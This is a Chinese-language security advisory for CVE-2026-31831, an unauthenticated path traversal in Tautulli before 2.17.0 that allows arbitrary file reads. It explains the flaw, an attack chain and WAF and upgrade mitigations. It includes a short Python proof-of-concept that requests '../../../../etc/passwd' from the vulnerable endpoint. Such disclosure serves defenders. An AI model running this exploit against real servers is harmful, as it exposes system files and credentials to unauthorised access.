CVE-2026-31831 CVSS 7.5 高危

CVE-2026-31831 Tautulli 路径穿越致任意文件读取漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31831

漏洞类型

路径穿越

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tautulli

漏洞概述

Tautulli是一款基于Python的Plex Media Server监控与追踪工具。在其2.17.0版本之前，系统存在一处严重的安全缺陷。位于`/newsletter/image/images`的API接口未能有效防御路径遍历攻击，这使得未经身份验证的攻击者能够利用该漏洞，从服务器文件系统中读取任意文件。鉴于该漏洞无需用户交互且利用难度低，其CVSS v3.1评分高达7.5级，属于高危风险。攻击者可能借此获取敏感配置信息，进而威胁服务器的整体安全性。官方已在v2.17.0版本中发布补丁修复了此问题。

技术细节

该漏洞的根本原因在于Tautulli处理`/newsletter/image/images` API请求时，对传入的文件路径参数缺乏严格的校验和规范化处理。攻击者可以利用`../`序列（或其URL编码形式）在目录树中向上回溯，从而访问Web根目录之外的文件。由于该接口未设置认证门槛（CVSS向量PR:N），任何能够访问该服务端口的攻击者均可发起攻击。利用过程通常涉及构造特定的HTTP请求，将路径参数指向敏感系统文件（如`/etc/passwd`或应用配置文件）。一旦利用成功，攻击者可获得高机密性（C:H）的数据访问权限。虽然此漏洞不直接导致代码执行或文件破坏，但泄露的信息往往为进一步入侵提供关键凭据。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描互联网或内网，寻找开放的Tautulli服务实例，确认其版本是否低于2.17.0。

STEP 2

2. 发送恶意请求

攻击者向`/newsletter/image/images`端点发送特制的HTTP请求，在参数中插入路径遍历字符（如`../`），试图访问系统敏感文件。

STEP 3

3. 数据回传

服务器由于未过滤路径，将请求的文件内容（如/etc/passwd或配置文件）直接返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://localhost:8181"

# Vulnerable endpoint and payload for path traversal
# Attempting to read /etc/passwd
payload = "../../../../etc/passwd"
vulnerable_endpoint = f"{target_url}/newsletter/image/images?file={payload}"

try:
    response = requests.get(vulnerable_endpoint)
    
    if response.status_code == 200:
        print("[+] Vulnerability confirmed!")
        print("[+] File content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Tautulli < 2.17.0

防御指南

临时缓解措施

如果无法立即升级，建议配置Web应用防火墙（WAF）规则，拦截包含`../`、`%2e%2e/`等路径穿越特征的请求，或临时禁用newsletter功能模块。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表